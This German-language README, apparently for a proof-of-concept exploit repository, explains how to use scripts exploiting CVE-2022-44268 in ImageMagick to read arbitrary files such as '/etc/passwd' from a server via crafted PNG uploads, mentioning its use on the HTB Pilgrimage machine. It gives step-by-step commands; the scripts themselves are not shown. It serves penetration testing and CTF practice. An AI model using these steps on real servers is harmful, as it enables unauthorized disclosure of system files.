
Proof-of-Concept-Exploit für CVE-2022-44268, der beliebiges Dateilesen über manipulierte PNG-Bilder ermöglicht, die von ImageMagick verarbeitet werden. Enthält Generierungs- und Dekodierungsskripte für Penetrationstests und CTF-Herausforderungen.
auch in htb pilgrimage verwendet
Die Forscher von MetabaseQ entdeckten CVE-2022-44268, d.h. ImageMagick 7.1.0-49 ist anfällig für Informationspreisgabe. Wenn es ein PNG-Bild parst (z.B. zum Ändern der Größe), kann das resultierende Bild den Inhalt einer beliebigen entfernten Datei eingebettet haben (falls das ImageMagick-Binary die Berechtigung hat, sie zu lesen).
Schritt 1 :
Führe aus
pip install pillow
sudo apt install graphicsmagick-imagemagick-compat
Schritt 2 ;
Führe aus
python3 magick_exploit.py generate -l [local_file] -o [output_file]
Hier in diesem Fall ist die lokale Datei '/etc/passwd', die ich von der Opfermaschine erhalten möchte.
Schritt 3 :
Lade die Bilddatei auf die Website hoch.
Schritt 4 :
Hole die konvertierte Bilddatei von der Website. Benenne sie als 'downloaded_image.png'
Schritt 5:
Führe aus
python3 decode_profile.py

Falls ein Fehler wie
"/home/kali/codeplay/oscp/htb/machines/pilgrimage/decode_profile.py", line 8, in <module>
profile = output_str.split("Raw profile type: \n\n ")[1].split('Date:create:')[0]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^
IndexError: list index out of range
auftritt, bedeutet das, dass die von dir genannte Datei nicht existiert. Verwende /etc/passwd für einen Test.